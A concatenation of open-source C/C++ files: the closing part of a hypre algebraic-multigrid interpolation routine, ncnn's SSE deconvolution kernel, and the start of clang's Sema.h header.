HYPRE_BigInt col_1 = hypre_ParCSRMatrixFirstRowIndex(A);
HYPRE_Int local_numrows = hypre_CSRMatrixNumRows(A_diag);
HYPRE_BigInt col_n = col_1 + (HYPRE_BigInt)local_numrows;
HYPRE_BigInt total_global_cpts, my_first_cpt;
/* Variables to store strong connection matrix info */
hypre_CSRMatrix *S_diag = hypre_ParCSRMatrixDiag(S);
HYPRE_Int *S_diag_i = hypre_CSRMatrixI(S_diag);
HYPRE_Int *S_diag_j = hypre_CSRMatrixJ(S_diag);
hypre_CSRMatrix *S_offd = hypre_ParCSRMatrixOffd(S);
HYPRE_Int *S_offd_i = hypre_CSRMatrixI(S_offd);
HYPRE_Int *S_offd_j = hypre_CSRMatrixJ(S_offd);
/* Interpolation matrix P */
hypre_ParCSRMatrix *P;
hypre_CSRMatrix *P_diag;
hypre_CSRMatrix *P_offd;
HYPRE_Real *P_diag_data = NULL;
HYPRE_Int *P_diag_i, *P_diag_j = NULL;
HYPRE_Real *P_offd_data = NULL;
HYPRE_Int *P_offd_i, *P_offd_j = NULL;
/*HYPRE_Int *col_map_offd_P = NULL;*/
HYPRE_Int P_diag_size;
HYPRE_Int P_offd_size;
HYPRE_Int *P_marker = NULL;
HYPRE_Int *P_marker_offd = NULL;
HYPRE_Int *CF_marker_offd = NULL;
HYPRE_Int *tmp_CF_marker_offd = NULL;
HYPRE_Int *dof_func_offd = NULL;
   /* Full row information for columns of A that are off diag */
hypre_CSRMatrix *A_ext;
HYPRE_Real *A_ext_data;
HYPRE_Int *A_ext_i;
HYPRE_BigInt *A_ext_j;
HYPRE_Int *fine_to_coarse = NULL;
HYPRE_BigInt *fine_to_coarse_offd = NULL;
HYPRE_Int *old_coarse_to_fine = NULL;
HYPRE_Int loc_col;
HYPRE_Int full_off_procNodes;
hypre_CSRMatrix *Sop;
HYPRE_Int *Sop_i;
HYPRE_BigInt *Sop_j;
HYPRE_Int sgn;
/* Variables to keep count of interpolatory points */
HYPRE_Int jj_counter, jj_counter_offd;
HYPRE_Int jj_begin_row, jj_end_row;
HYPRE_Int jj_begin_row_offd = 0;
HYPRE_Int jj_end_row_offd = 0;
HYPRE_Int coarse_counter;
HYPRE_Int n_coarse_old;
HYPRE_BigInt total_old_global_cpts;
/* Interpolation weight variables */
HYPRE_Real sum, diagonal, distribute;
HYPRE_Int strong_f_marker = -2;
/* Loop variables */
/*HYPRE_Int index;*/
HYPRE_Int cnt, old_cnt;
HYPRE_Int start_indexing = 0;
HYPRE_Int i, ii, i1, i2, jj, kk, k1, jj1;
HYPRE_BigInt big_k1;
/* Definitions */
HYPRE_Real zero = 0.0;
HYPRE_Real one = 1.0;
HYPRE_Real wall_time;
hypre_ParCSRCommPkg *extend_comm_pkg = NULL;
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
/* BEGIN */
hypre_MPI_Comm_size(comm, &num_procs);
hypre_MPI_Comm_rank(comm, &my_id);
my_first_cpt = num_cpts_global[0];
/*my_first_old_cpt = num_old_cpts_global[0];*/
n_coarse_old = (HYPRE_Int)(num_old_cpts_global[1] - num_old_cpts_global[0]);
/*n_coarse = num_cpts_global[1] - num_cpts_global[0];*/
if (my_id == (num_procs - 1))
{
total_global_cpts = num_cpts_global[1];
total_old_global_cpts = num_old_cpts_global[1];
}
hypre_MPI_Bcast(&total_global_cpts, 1, HYPRE_MPI_BIG_INT, num_procs - 1, comm);
hypre_MPI_Bcast(&total_old_global_cpts, 1, HYPRE_MPI_BIG_INT, num_procs - 1, comm);
if (!comm_pkg)
{
hypre_MatvecCommPkgCreate(A);
comm_pkg = hypre_ParCSRMatrixCommPkg(A);
}
   /* Set up off processor information (specifically for neighbors of
    * neighbors) */
full_off_procNodes = 0;
if (num_procs > 1)
{
if (hypre_exchange_interp_data(
&CF_marker_offd, &dof_func_offd, &A_ext, &full_off_procNodes, &Sop, &extend_comm_pkg,
A, CF_marker, S, num_functions, dof_func, 1))
{
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_EXTENDED_I_INTERP] += hypre_MPI_Wtime();
#endif
return hypre_error_flag;
}
A_ext_i = hypre_CSRMatrixI(A_ext);
A_ext_j = hypre_CSRMatrixBigJ(A_ext);
A_ext_data = hypre_CSRMatrixData(A_ext);
Sop_i = hypre_CSRMatrixI(Sop);
Sop_j = hypre_CSRMatrixBigJ(Sop);
}
/*-----------------------------------------------------------------------
* First Pass: Determine size of P and fill in fine_to_coarse mapping.
*-----------------------------------------------------------------------*/
/*-----------------------------------------------------------------------
* Initialize counters and allocate mapping vector.
*-----------------------------------------------------------------------*/
P_diag_i = hypre_CTAlloc(HYPRE_Int, n_coarse_old + 1, HYPRE_MEMORY_HOST);
P_offd_i = hypre_CTAlloc(HYPRE_Int, n_coarse_old + 1, HYPRE_MEMORY_HOST);
if (n_fine)
{
old_coarse_to_fine = hypre_CTAlloc(HYPRE_Int, n_coarse_old, HYPRE_MEMORY_HOST);
fine_to_coarse = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST);
P_marker = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST);
}
if (full_off_procNodes)
{
P_marker_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST);
fine_to_coarse_offd = hypre_CTAlloc(HYPRE_BigInt, full_off_procNodes, HYPRE_MEMORY_HOST);
tmp_CF_marker_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST);
}
hypre_initialize_vecs(n_fine, full_off_procNodes, fine_to_coarse,
fine_to_coarse_offd, P_marker, P_marker_offd,
tmp_CF_marker_offd);
jj_counter = start_indexing;
jj_counter_offd = start_indexing;
coarse_counter = 0;
cnt = 0;
old_cnt = 0;
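/* Build the index maps: points carried over from the old coarse grid have
 * CF_marker 1 (still coarse) or -2 (now fine); both get an entry in
 * old_coarse_to_fine, and the still-coarse ones also receive a new coarse
 * index in fine_to_coarse. */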
for (i = 0; i < n_fine; i++)
{
fine_to_coarse[i] = -1;
if (CF_marker[i] == 1)
{
fine_to_coarse[i] = cnt++;
old_coarse_to_fine[old_cnt++] = i;
}
else if (CF_marker[i] == -2)
{
old_coarse_to_fine[old_cnt++] = i;
}
}
/*-----------------------------------------------------------------------
 * Loop over the old coarse grid.
 *-----------------------------------------------------------------------*/
for (ii = 0; ii < n_coarse_old; ii++)
{
P_diag_i[ii] = jj_counter;
if (num_procs > 1)
{
P_offd_i[ii] = jj_counter_offd;
}
i = old_coarse_to_fine[ii];
if (CF_marker[i] > 0)
{
jj_counter++;
coarse_counter++;
}
/*--------------------------------------------------------------------
* If i is an F-point, interpolation is from the C-points that
* strongly influence i, or C-points that strongly influence F-points
* that strongly influence i.
*--------------------------------------------------------------------*/
else if (CF_marker[i] == -2)
{
for (jj = S_diag_i[i]; jj < S_diag_i[i + 1]; jj++)
{
i1 = S_diag_j[jj];
if (CF_marker[i1] > 0)
{
/* i1 is a C point */
if (P_marker[i1] < P_diag_i[ii])
{
P_marker[i1] = jj_counter;
jj_counter++;
}
}
else if (CF_marker[i1] != -3)
{
/* i1 is an F-point; loop through its strong neighbors */
for (kk = S_diag_i[i1]; kk < S_diag_i[i1 + 1]; kk++)
{
k1 = S_diag_j[kk];
if (CF_marker[k1] > 0)
{
if (P_marker[k1] < P_diag_i[ii])
{
P_marker[k1] = jj_counter;
jj_counter++;
}
}
}
if (num_procs > 1)
{
for (kk = S_offd_i[i1]; kk < S_offd_i[i1 + 1]; kk++)
{
k1 = S_offd_j[kk];
if (CF_marker_offd[k1] > 0)
{
if (P_marker_offd[k1] < P_offd_i[ii])
{
tmp_CF_marker_offd[k1] = 1;
P_marker_offd[k1] = jj_counter_offd;
jj_counter_offd++;
}
}
}
}
}
}
/* Look at off diag strong connections of i */
if (num_procs > 1)
{
for (jj = S_offd_i[i]; jj < S_offd_i[i + 1]; jj++)
{
i1 = S_offd_j[jj];
if (CF_marker_offd[i1] > 0)
{
if (P_marker_offd[i1] < P_offd_i[ii])
{
tmp_CF_marker_offd[i1] = 1;
P_marker_offd[i1] = jj_counter_offd;
jj_counter_offd++;
}
}
else if (CF_marker_offd[i1] != -3)
{
/* F point; look at neighbors of i1. Sop contains global col
* numbers and entries that could be in S_diag or S_offd or
* neither. */
for (kk = Sop_i[i1]; kk < Sop_i[i1 + 1]; kk++)
{
big_k1 = Sop_j[kk];
if (big_k1 >= col_1 && big_k1 < col_n)
{
/* In S_diag */
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] < P_diag_i[ii])
{
P_marker[loc_col] = jj_counter;
jj_counter++;
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] < P_offd_i[ii])
{
P_marker_offd[loc_col] = jj_counter_offd;
tmp_CF_marker_offd[loc_col] = 1;
jj_counter_offd++;
}
}
}
}
}
}
}
}
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
hypre_printf("Proc = %d determine structure %f\n",
my_id, wall_time);
fflush(NULL);
}
/*-----------------------------------------------------------------------
* Allocate arrays.
*-----------------------------------------------------------------------*/
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
P_diag_size = jj_counter;
P_offd_size = jj_counter_offd;
if (P_diag_size)
{
P_diag_j = hypre_CTAlloc(HYPRE_Int, P_diag_size, HYPRE_MEMORY_HOST);
P_diag_data = hypre_CTAlloc(HYPRE_Real, P_diag_size, HYPRE_MEMORY_HOST);
}
if (P_offd_size)
{
P_offd_j = hypre_CTAlloc(HYPRE_Int, P_offd_size, HYPRE_MEMORY_HOST);
P_offd_data = hypre_CTAlloc(HYPRE_Real, P_offd_size, HYPRE_MEMORY_HOST);
}
P_diag_i[n_coarse_old] = jj_counter;
P_offd_i[n_coarse_old] = jj_counter_offd;
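/* Close the CSR row pointers: the last entries of P_diag_i and P_offd_i
 * hold the total nonzero counts determined in the first pass. */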
jj_counter = start_indexing;
jj_counter_offd = start_indexing;
/* Fine to coarse mapping */
if (num_procs > 1)
{
hypre_big_insert_new_nodes(comm_pkg, extend_comm_pkg, fine_to_coarse,
full_off_procNodes, my_first_cpt,
fine_to_coarse_offd);
}
for (i = 0; i < n_fine; i++)
{
P_marker[i] = -1;
}
for (i = 0; i < full_off_procNodes; i++)
{
P_marker_offd[i] = -1;
}
/*-----------------------------------------------------------------------
 * Loop over the old coarse grid points.
 *-----------------------------------------------------------------------*/
for (ii = 0; ii < n_coarse_old; ii++)
{
jj_begin_row = jj_counter;
jj_begin_row_offd = jj_counter_offd;
i = old_coarse_to_fine[ii];
/*--------------------------------------------------------------------
* If i is a C-point, interpolation is the identity.
*--------------------------------------------------------------------*/
if (CF_marker[i] > 0)
{
P_diag_j[jj_counter] = fine_to_coarse[i];
P_diag_data[jj_counter] = one;
jj_counter++;
}
/*--------------------------------------------------------------------
* If i is an F-point, build interpolation.
*--------------------------------------------------------------------*/
else if (CF_marker[i] == -2)
{
strong_f_marker--;
for (jj = S_diag_i[i]; jj < S_diag_i[i + 1]; jj++)
{
i1 = S_diag_j[jj];
/*--------------------------------------------------------------
* If neighbor i1 is a C-point, set column number in P_diag_j
* and initialize interpolation weight to zero.
*--------------------------------------------------------------*/
if (CF_marker[i1] >= 0)
{
if (P_marker[i1] < jj_begin_row)
{
P_marker[i1] = jj_counter;
P_diag_j[jj_counter] = fine_to_coarse[i1];
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
else if (CF_marker[i1] != -3)
{
P_marker[i1] = strong_f_marker;
for (kk = S_diag_i[i1]; kk < S_diag_i[i1 + 1]; kk++)
{
k1 = S_diag_j[kk];
if (CF_marker[k1] >= 0)
{
if (P_marker[k1] < jj_begin_row)
{
P_marker[k1] = jj_counter;
P_diag_j[jj_counter] = fine_to_coarse[k1];
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
}
if (num_procs > 1)
{
for (kk = S_offd_i[i1]; kk < S_offd_i[i1 + 1]; kk++)
{
k1 = S_offd_j[kk];
if (CF_marker_offd[k1] >= 0)
{
if (P_marker_offd[k1] < jj_begin_row_offd)
{
P_marker_offd[k1] = jj_counter_offd;
P_offd_j[jj_counter_offd] = k1;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
}
}
}
}
if (num_procs > 1)
{
for (jj = S_offd_i[i]; jj < S_offd_i[i + 1]; jj++)
{
i1 = S_offd_j[jj];
if (CF_marker_offd[i1] >= 0)
{
if (P_marker_offd[i1] < jj_begin_row_offd)
{
P_marker_offd[i1] = jj_counter_offd;
P_offd_j[jj_counter_offd] = i1;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
else if (CF_marker_offd[i1] != -3)
{
P_marker_offd[i1] = strong_f_marker;
for (kk = Sop_i[i1]; kk < Sop_i[i1 + 1]; kk++)
{
big_k1 = Sop_j[kk];
/* Find local col number */
if (big_k1 >= col_1 && big_k1 < col_n)
{
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] < jj_begin_row)
{
P_marker[loc_col] = jj_counter;
P_diag_j[jj_counter] = fine_to_coarse[loc_col];
P_diag_data[jj_counter] = zero;
jj_counter++;
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] < jj_begin_row_offd)
{
P_marker_offd[loc_col] = jj_counter_offd;
P_offd_j[jj_counter_offd] = loc_col;
P_offd_data[jj_counter_offd] = zero;
jj_counter_offd++;
}
}
}
}
}
}
jj_end_row = jj_counter;
jj_end_row_offd = jj_counter_offd;
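/* Second pass over row i of A: strong C-connections accumulate directly
 * into P; a strong F-connection is distributed among the C-points already
 * entered in this row of P, weighted by the F-point's own connections;
 * weak connections are folded into the diagonal. */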
diagonal = A_diag_data[A_diag_i[i]];
for (jj = A_diag_i[i] + 1; jj < A_diag_i[i + 1]; jj++)
{
/* i1 is a C-point and strongly influences i; accumulate
 * a_(i,i1) into the interpolation weight */
i1 = A_diag_j[jj];
if (P_marker[i1] >= jj_begin_row)
{
P_diag_data[P_marker[i1]] += A_diag_data[jj];
}
else if (P_marker[i1] == strong_f_marker)
{
sum = zero;
sgn = 1;
if (A_diag_data[A_diag_i[i1]] < 0) { sgn = -1; }
/* Loop over row of A for point i1 and calculate the sum
 * of the connections to C-points that strongly influence i. */
for (jj1 = A_diag_i[i1] + 1; jj1 < A_diag_i[i1 + 1]; jj1++)
{
i2 = A_diag_j[jj1];
if ((P_marker[i2] >= jj_begin_row) && (sgn * A_diag_data[jj1]) < 0)
{
sum += A_diag_data[jj1];
}
}
if (num_procs > 1)
{
for (jj1 = A_offd_i[i1]; jj1 < A_offd_i[i1 + 1]; jj1++)
{
i2 = A_offd_j[jj1];
if (P_marker_offd[i2] >= jj_begin_row_offd &&
(sgn * A_offd_data[jj1]) < 0)
{
sum += A_offd_data[jj1];
}
}
}
if (sum != 0)
{
distribute = A_diag_data[jj] / sum;
/* Loop over row of A for point i1 and do the distribution */
for (jj1 = A_diag_i[i1] + 1; jj1 < A_diag_i[i1 + 1]; jj1++)
{
i2 = A_diag_j[jj1];
if (P_marker[i2] >= jj_begin_row && (sgn * A_diag_data[jj1]) < 0)
P_diag_data[P_marker[i2]] +=
distribute * A_diag_data[jj1];
}
if (num_procs > 1)
{
for (jj1 = A_offd_i[i1]; jj1 < A_offd_i[i1 + 1]; jj1++)
{
i2 = A_offd_j[jj1];
if (P_marker_offd[i2] >= jj_begin_row_offd &&
(sgn * A_offd_data[jj1]) < 0)
P_offd_data[P_marker_offd[i2]] +=
distribute * A_offd_data[jj1];
}
}
}
else
{
diagonal += A_diag_data[jj];
}
}
/* neighbor i1 weakly influences i; accumulate a_(i,i1) into the
 * diagonal */
else if (CF_marker[i1] != -3)
{
if (num_functions == 1 || dof_func[i] == dof_func[i1])
{
diagonal += A_diag_data[jj];
}
}
}
if (num_procs > 1)
{
for (jj = A_offd_i[i]; jj < A_offd_i[i + 1]; jj++)
{
i1 = A_offd_j[jj];
if (P_marker_offd[i1] >= jj_begin_row_offd)
{
P_offd_data[P_marker_offd[i1]] += A_offd_data[jj];
}
else if (P_marker_offd[i1] == strong_f_marker)
{
sum = zero;
sgn = 1;
for (jj1 = A_ext_i[i1]; jj1 < A_ext_i[i1 + 1]; jj1++)
{
big_k1 = A_ext_j[jj1];
if (big_k1 >= col_1 && big_k1 < col_n)
{
/* diag */
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] >= jj_begin_row)
{
sum += A_ext_data[jj1];
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] >= jj_begin_row_offd &&
(sgn * A_ext_data[jj1]) < 0)
{
sum += A_ext_data[jj1];
}
}
}
if (sum != 0)
{
distribute = A_offd_data[jj] / sum;
for (jj1 = A_ext_i[i1]; jj1 < A_ext_i[i1 + 1]; jj1++)
{
big_k1 = A_ext_j[jj1];
if (big_k1 >= col_1 && big_k1 < col_n)
{
/* diag */
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] >= jj_begin_row)
P_diag_data[P_marker[loc_col]] += distribute *
A_ext_data[jj1];
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] >= jj_begin_row_offd)
P_offd_data[P_marker_offd[loc_col]] += distribute *
A_ext_data[jj1];
}
}
}
else
{
diagonal += A_offd_data[jj];
}
}
else if (CF_marker_offd[i1] != -3)
{
if (num_functions == 1 || dof_func[i] == dof_func_offd[i1])
{
diagonal += A_offd_data[jj];
}
}
}
}
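/* Finish the interpolation row: scale every accumulated weight by
 * -1/diagonal, where diagonal holds a_ii plus the weak couplings
 * lumped into it above. */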
if (diagonal)
{
for (jj = jj_begin_row; jj < jj_end_row; jj++)
{
P_diag_data[jj] /= -diagonal;
}
for (jj = jj_begin_row_offd; jj < jj_end_row_offd; jj++)
{
P_offd_data[jj] /= -diagonal;
}
}
}
strong_f_marker--;
}
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
hypre_printf("Proc = %d fill structure %f\n",
my_id, wall_time);
fflush(NULL);
}
/*-----------------------------------------------------------------------
 * Create the ParCSR interpolation matrix P and attach the assembled arrays.
 *-----------------------------------------------------------------------*/
P = hypre_ParCSRMatrixCreate(comm,
total_old_global_cpts,
total_global_cpts,
num_old_cpts_global,
num_cpts_global,
0,
P_diag_i[n_coarse_old],
P_offd_i[n_coarse_old]);
P_diag = hypre_ParCSRMatrixDiag(P);
hypre_CSRMatrixData(P_diag) = P_diag_data;
hypre_CSRMatrixI(P_diag) = P_diag_i;
hypre_CSRMatrixJ(P_diag) = P_diag_j;
P_offd = hypre_ParCSRMatrixOffd(P);
hypre_CSRMatrixData(P_offd) = P_offd_data;
hypre_CSRMatrixI(P_offd) = P_offd_i;
hypre_CSRMatrixJ(P_offd) = P_offd_j;
hypre_CSRMatrixMemoryLocation(P_diag) = HYPRE_MEMORY_HOST;
hypre_CSRMatrixMemoryLocation(P_offd) = HYPRE_MEMORY_HOST;
/* Compress P, removing coefficients smaller than trunc_factor * Max */
if (trunc_factor != 0.0 || max_elmts > 0)
{
hypre_BoomerAMGInterpTruncation(P, trunc_factor, max_elmts);
P_diag_data = hypre_CSRMatrixData(P_diag);
P_diag_i = hypre_CSRMatrixI(P_diag);
P_diag_j = hypre_CSRMatrixJ(P_diag);
P_offd_data = hypre_CSRMatrixData(P_offd);
P_offd_i = hypre_CSRMatrixI(P_offd);
P_offd_j = hypre_CSRMatrixJ(P_offd);
P_diag_size = P_diag_i[n_coarse_old];
P_offd_size = P_offd_i[n_coarse_old];
}
/* This builds col_map; col_map should be monotonically increasing and
 * contain global numbers. */
if (P_offd_size)
{
hypre_build_interp_colmap(P, full_off_procNodes, tmp_CF_marker_offd, fine_to_coarse_offd);
}
hypre_MatvecCommPkgCreate(P);
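/* Map temporary CF marker values (< -1) back to the standard F-point
 * value -1 before returning. */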
for (i = 0; i < n_fine; i++)
if (CF_marker[i] < -1) { CF_marker[i] = -1; }
*P_ptr = P;
/* Deallocate memory */
hypre_TFree(fine_to_coarse, HYPRE_MEMORY_HOST);
hypre_TFree(old_coarse_to_fine, HYPRE_MEMORY_HOST);
hypre_TFree(P_marker, HYPRE_MEMORY_HOST);
if (num_procs > 1)
{
hypre_CSRMatrixDestroy(Sop);
hypre_CSRMatrixDestroy(A_ext);
hypre_TFree(fine_to_coarse_offd, HYPRE_MEMORY_HOST);
hypre_TFree(P_marker_offd, HYPRE_MEMORY_HOST);
hypre_TFree(CF_marker_offd, HYPRE_MEMORY_HOST);
hypre_TFree(tmp_CF_marker_offd, HYPRE_MEMORY_HOST);
if (num_functions > 1)
{
hypre_TFree(dof_func_offd, HYPRE_MEMORY_HOST);
}
hypre_MatvecCommPkgDestroy(extend_comm_pkg);
}
return hypre_error_flag;
}
|
deconvolution_pack4to1.h | // Tencent is pleased to support the open source community by making ncnn available.
//
// Copyright (C) 2022 THL A29 Limited, a Tencent company. All rights reserved.
//
// Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// https://opensource.org/licenses/BSD-3-Clause
//
// Unless required by applicable law or agreed to in writing, software distributed
// under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
// CONDITIONS OF ANY KIND, either express or implied. See the License for the
// specific language governing permissions and limitations under the License.
static void deconvolution_pack4to1_sse(const Mat& bottom_blob, Mat& top_blob, const Mat& weight_data_packed, const Mat& bias_data, int kernel_w, int kernel_h, int dilation_w, int dilation_h, int stride_w, int stride_h, int activation_type, const Mat& activation_params, const Option& opt)
{
int w = bottom_blob.w;
int h = bottom_blob.h;
int channels = bottom_blob.c;
int outw = top_blob.w;
int outh = top_blob.h;
int outch = top_blob.c;
const int kernel_extent_w = dilation_w * (kernel_w - 1) + 1;
const int kernel_extent_h = dilation_h * (kernel_h - 1) + 1;
const int maxk = kernel_w * kernel_h;
const float* bias_data_ptr = bias_data;
// num_output
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < outch; p++)
{
float* outptr = top_blob.channel(p);
for (int i = 0; i < outh; i++)
{
for (int j = 0; j < outw; j++)
{
float sum = 0.f;
if (bias_data_ptr)
{
sum = bias_data_ptr[p];
}
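// _sum accumulates products across the 4 packed input lanes of the
// pack4 layout; it is reduced to a scalar after the channel loop.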
__m128 _sum = _mm_setzero_ps();
const float* kptr = weight_data_packed.channel(p);
// channels
for (int q = 0; q < channels; q++)
{
const Mat m = bottom_blob.channel(q);
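// Deconvolution computed as a gather: output pixel (i, j) collects every
// input sample whose dilated kernel footprint covers it, i.e. the shifted
// coordinates (sys, sxs) must be non-negative multiples of the stride.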
for (int y = 0; y < kernel_h; y++)
{
int sys = (i + y * dilation_h - (kernel_extent_h - 1));
if (sys < 0 || sys % stride_h != 0)
continue;
int sy = sys / stride_h;
if (sy >= h)
continue;
for (int x = 0; x < kernel_w; x++)
{
int sxs = (j + x * dilation_w - (kernel_extent_w - 1));
if (sxs < 0 || sxs % stride_w != 0)
continue;
int sx = sxs / stride_w;
if (sx >= w)
continue;
const float* sptr = m.row(sy) + sx * 4;
int k = y * kernel_w + x;
__m128 _val = _mm_load_ps(sptr);
__m128 _w = _mm_load_ps(kptr + k * 4);
_sum = _mm_comp_fmadd_ps(_val, _w, _sum);
}
}
kptr += maxk * 4;
}
sum += _mm_reduce_add_ps(_sum);
sum = activation_ss(sum, activation_type, activation_params);
outptr[0] = sum;
outptr++;
}
}
}
}
|
Sema.h | //===--- Sema.h - Semantic Analysis & AST Building --------------*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
//
// This file defines the Sema class, which performs semantic analysis and
// builds ASTs.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_CLANG_SEMA_SEMA_H
#define LLVM_CLANG_SEMA_SEMA_H
#include "clang/AST/ASTConcept.h"
#include "clang/AST/ASTFwd.h"
#include "clang/AST/Attr.h"
#include "clang/AST/Availability.h"
#include "clang/AST/ComparisonCategories.h"
#include "clang/AST/DeclTemplate.h"
#include "clang/AST/DeclarationName.h"
#include "clang/AST/Expr.h"
#include "clang/AST/ExprCXX.h"
#include "clang/AST/ExprConcepts.h"
#include "clang/AST/ExprObjC.h"
#include "clang/AST/ExprOpenMP.h"
#include "clang/AST/ExternalASTSource.h"
#include "clang/AST/LocInfoType.h"
#include "clang/AST/MangleNumberingContext.h"
#include "clang/AST/NSAPI.h"
#include "clang/AST/PrettyPrinter.h"
#include "clang/AST/StmtCXX.h"
#include "clang/AST/TypeLoc.h"
#include "clang/APINotes/APINotesManager.h"
#include "clang/AST/TypeOrdering.h"
#include "clang/Basic/BitmaskEnum.h"
#include "clang/Basic/ExpressionTraits.h"
#include "clang/Basic/Module.h"
#include "clang/Basic/OpenCLOptions.h"
#include "clang/Basic/OpenMPKinds.h"
#include "clang/Basic/PragmaKinds.h"
#include "clang/Basic/Specifiers.h"
#include "clang/Basic/TemplateKinds.h"
#include "clang/Basic/TypeTraits.h"
#include "clang/Sema/AnalysisBasedWarnings.h"
#include "clang/Sema/CleanupInfo.h"
#include "clang/Sema/DeclSpec.h"
#include "clang/Sema/ExternalSemaSource.h"
#include "clang/Sema/IdentifierResolver.h"
#include "clang/Sema/ObjCMethodList.h"
#include "clang/Sema/Ownership.h"
#include "clang/Sema/Scope.h"
#include "clang/Sema/SemaConcept.h"
#include "clang/Sema/TypoCorrection.h"
#include "clang/Sema/Weak.h"
#include "llvm/ADT/ArrayRef.h"
#include "llvm/ADT/Optional.h"
#include "llvm/ADT/SetVector.h"
#include "llvm/ADT/SmallBitVector.h"
#include "llvm/ADT/SmallSet.h"
#include "llvm/ADT/SmallPtrSet.h"
#include "llvm/ADT/SmallVector.h"
#include "llvm/ADT/TinyPtrVector.h"
#include "llvm/Frontend/OpenMP/OMPConstants.h"
#include <deque>
#include <functional>
#include <memory>
#include <string>
#include <tuple>
#include <vector>
namespace llvm {
class APSInt;
template <typename ValueT> struct DenseMapInfo;
template <typename ValueT, typename ValueInfoT> class DenseSet;
class SmallBitVector;
struct InlineAsmIdentifierInfo;
}
namespace clang {
class ADLResult;
class ASTConsumer;
class ASTContext;
class ASTMutationListener;
class ASTReader;
class ASTWriter;
class ArrayType;
class ParsedAttr;
class BindingDecl;
class BlockDecl;
class CapturedDecl;
class CXXBasePath;
class CXXBasePaths;
class CXXBindTemporaryExpr;
typedef SmallVector<CXXBaseSpecifier*, 4> CXXCastPath;
class CXXConstructorDecl;
class CXXConversionDecl;
class CXXDeleteExpr;
class CXXDestructorDecl;
class CXXFieldCollector;
class CXXMemberCallExpr;
class CXXMethodDecl;
class CXXScopeSpec;
class CXXTemporary;
class CXXTryStmt;
class CallExpr;
class ClassTemplateDecl;
class ClassTemplatePartialSpecializationDecl;
class ClassTemplateSpecializationDecl;
class VarTemplatePartialSpecializationDecl;
class CodeCompleteConsumer;
class CodeCompletionAllocator;
class CodeCompletionTUInfo;
class CodeCompletionResult;
class CoroutineBodyStmt;
class Decl;
class DeclAccessPair;
class DeclContext;
class DeclRefExpr;
class DeclaratorDecl;
class DeducedTemplateArgument;
class DependentDiagnostic;
class DesignatedInitExpr;
class Designation;
class EnableIfAttr;
class EnumConstantDecl;
class Expr;
class ExtVectorType;
class FormatAttr;
class FriendDecl;
class FunctionDecl;
class FunctionProtoType;
class FunctionTemplateDecl;
class ImplicitConversionSequence;
typedef MutableArrayRef<ImplicitConversionSequence> ConversionSequenceList;
class InitListExpr;
class InitializationKind;
class InitializationSequence;
class InitializedEntity;
class IntegerLiteral;
class LabelStmt;
class LambdaExpr;
class LangOptions;
class LocalInstantiationScope;
class LookupResult;
class MacroInfo;
typedef ArrayRef<std::pair<IdentifierInfo *, SourceLocation>> ModuleIdPath;
class ModuleLoader;
class MultiLevelTemplateArgumentList;
class NamedDecl;
class ObjCCategoryDecl;
class ObjCCategoryImplDecl;
class ObjCCompatibleAliasDecl;
class ObjCContainerDecl;
class ObjCImplDecl;
class ObjCImplementationDecl;
class ObjCInterfaceDecl;
class ObjCIvarDecl;
template <class T> class ObjCList;
class ObjCMessageExpr;
class ObjCMethodDecl;
class ObjCPropertyDecl;
class ObjCProtocolDecl;
class OMPThreadPrivateDecl;
class OMPRequiresDecl;
class OMPDeclareReductionDecl;
class OMPDeclareSimdDecl;
class OMPClause;
struct OMPVarListLocTy;
struct OverloadCandidate;
enum class OverloadCandidateParamOrder : char;
enum OverloadCandidateRewriteKind : unsigned;
class OverloadCandidateSet;
class OverloadExpr;
class ParenListExpr;
class ParmVarDecl;
class Preprocessor;
class PseudoDestructorTypeStorage;
class PseudoObjectExpr;
class QualType;
class StandardConversionSequence;
class Stmt;
class StringLiteral;
class SwitchStmt;
class TemplateArgument;
class TemplateArgumentList;
class TemplateArgumentLoc;
class TemplateDecl;
class TemplateInstantiationCallback;
class TemplateParameterList;
class TemplatePartialOrderingContext;
class TemplateTemplateParmDecl;
class Token;
class TypeAliasDecl;
class TypedefDecl;
class TypedefNameDecl;
class TypeLoc;
class TypoCorrectionConsumer;
class UnqualifiedId;
class UnresolvedLookupExpr;
class UnresolvedMemberExpr;
class UnresolvedSetImpl;
class UnresolvedSetIterator;
class UsingDecl;
class UsingShadowDecl;
class ValueDecl;
class VarDecl;
class VarTemplateSpecializationDecl;
class VisibilityAttr;
class VisibleDeclConsumer;
class IndirectFieldDecl;
struct DeductionFailureInfo;
class TemplateSpecCandidateSet;
namespace sema {
class AccessedEntity;
class BlockScopeInfo;
class Capture;
class CapturedRegionScopeInfo;
class CapturingScopeInfo;
